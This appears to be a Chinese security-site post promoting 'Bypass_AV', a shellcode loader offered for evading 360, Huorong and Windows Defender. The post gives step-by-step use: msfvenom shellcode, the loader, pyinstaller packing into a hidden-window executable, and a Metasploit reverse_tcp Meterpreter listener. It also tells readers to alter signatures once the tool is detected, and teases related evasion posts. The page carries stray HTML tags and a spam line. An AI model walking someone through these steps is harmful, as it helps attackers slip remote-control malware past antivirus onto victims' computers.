<menu id="guoca"></menu>
<nav id="guoca"></nav><xmp id="guoca">
  • <xmp id="guoca">
  • <nav id="guoca"><code id="guoca"></code></nav>
  • <nav id="guoca"><code id="guoca"></code></nav>
    網安 - 專業的網絡安全產業、社區、知識平臺

    免殺工具 -- Bypass_AV?【文末抽獎】

    VSole2022-08-16 22:02:56

    一、工具簡介

    Bypass_AV msf免殺,ShellCode免殺加載器 ,免殺shellcode執行程序 ,360&火絨&Windows Defender。代碼夠簡單,估計要不了多久就進特征庫了,被殺了再去改幾個特征碼照樣又可以免殺,保持更新。

    二、使用方法

    1、環境

    2022年5月8日 測試可以免殺國內殺軟 火絨&360及Windows Defender

    Windows 10 64位 360&火絨&Windows Defender

    Windows 7 64位 或以上操作系統應該都沒問題(沒有測試)

    2、使用msfvenom生成ShellCode(ShellCode 需要是64位的)

    3、加載器

    將生成的ShellCode 填至 Bypass_AV.py 里的 ShellCode = '''ShellCode''' 處,注意:保留原始ShellCode 里的雙引號 "

    4、打包成可執行程序

    Python 3.8.6

    pyinstaller 4.7

    pip install pyinstaller 

    pyinstaller -F -w Bypss_AV.py

    生成Bypass_AV.exe在dist目錄中

    5、運行監聽

    msfconsole
msf6 > use exploit/multi/handler 
msf6 exploit(multi/handler) > set payload windows/x64/meterpreter/reverse_tcp
msf6 exploit(multi/handler) > set lhost 0.0.0.0
msf6 exploit(multi/handler) > set lport 8080
msf6 exploit(multi/handler) > ru

    三、檢測效果

    四、工具下載

    項目地址:https://github.com/Axx8/Bypass_AV

    免殺handler
    本作品采用《CC 協議》,轉載必須注明作者和本文鏈接
    ShellCode加載器 ,360、火絨、Windows Defender
    2022-08-29 06:37:55
    Bypass_AV msf,ShellCode加載器 ,shellcode執行程序 ,360&火絨&Windows Defender代碼夠簡單,估計要不了多久就進特征庫了,被了再去改幾個特征碼照樣又可以,作者的github保持更新,可以去瞅瞅。測試可以國內軟?注意:ShellCode 需要是64位的加載器將生成的ShellCode 填至 Bypass_AV.py 里的 ShellCode = '''ShellCode''' 處注意:保留原始ShellCode 里的雙引號 "示例:最終格式:打包成可執行程序編譯Python 3.8.6pyinstaller 4.7pip install pyinstaller
    工具 -- Bypass_AV?【文末抽獎】
    2022-08-16 22:02:56
    Bypass_AV msf,ShellCode加載器 ,shellcode執行程序 ,360&火絨&Windows Defender。代碼夠簡單,估計要不了多久就進特征庫了,被了再去改幾個特征碼照樣又可以,保持更新。
    滲透測試-木馬的幾種方式
    2022-07-06 22:01:29
    ,又叫殺毒技術,是反病毒,反間諜的對立面,是一種能使病毒或木馬免于被殺毒軟件查殺的軟件。它除了使病毒木馬免于被查殺外,還可以擴增病毒木馬的功能,改變病毒木馬的行為。的基本特征是破壞特征,有可能是行為特征,只要破壞了病毒與木馬所固有的特征,并保證其原有功能沒有改變,一次就能完成了。
    知識匯總
    2021-08-25 23:11:00
    知識匯總
    Shellcodeloader過火絨
    2022-03-28 22:38:49
    今天腦子里面蹦出來個想法,殺木馬然后cs上線,本來想讓cs與msf聯動的,但是出了點小問題,還是先研究火絨吧。
    Powershell(無文件落地
    2022-01-27 07:21:36
    顧名思義,無需將惡意文件傳到目標服務器/機器上,直接利用powershell的特性加載到內存執行。為了在紅隊行動中更隱蔽的實施攻擊以及橫向移動,同時還可以解決目標不出網只能通過dns上線時的棘手問題,利用powershell可以避免一行行echo。
    CS/MSFShellCode加載器
    2023-06-05 09:25:16
    生成PayloadMetasploit,輸出c、py格式,可用xor、xor_dynamic、zutto_dekiru編碼器。CobaltStrike,這里選擇使用x64的C語言或Python語言的Shellcode。
    什么?你還不會webshell
    2022-07-26 16:36:58
    下載dll,并添加至ext中在php.ini 中添加該擴展修改configure.ini;?具體步驟通過phpinfo獲取擴展信息,根據不同的加密擴展進行嘗試利用默認密鑰進行加密,通過訪問webshell來判斷密鑰是否正確,當然,這種方法其實只能用于權限維持需要拿到權限后獲取擴展文件破解后,才能穩定獲取密鑰,進而加密webshell
    VSole
    網絡安全專家
      亚洲 欧美 自拍 唯美 另类